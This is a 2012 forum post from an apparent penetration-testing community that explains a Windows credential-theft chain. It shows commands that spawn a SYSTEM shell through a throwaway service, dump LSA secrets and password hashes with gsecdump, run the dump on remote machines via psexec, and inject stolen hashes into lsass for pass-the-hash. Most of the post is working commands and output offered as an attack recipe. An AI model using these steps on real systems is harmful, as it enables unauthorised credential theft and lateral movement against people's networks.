China Network Penetration Testing Alliance

Title: Hash injection attack

Author: admin    Time: 2012-11-6 21:09
To get a DOS Prompt as NT system:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process, which is the hash injection attack. The foreigners really are skilled; admins will have their hands full now. The LM/NT hashes picked up during ARP spoofing, or obtained with gethash, don't actually need to be cracked at all; it is just a matter of using the tool. As the original article puts it, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
& B/ r9 B- k5 G+ C. A9 F




Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2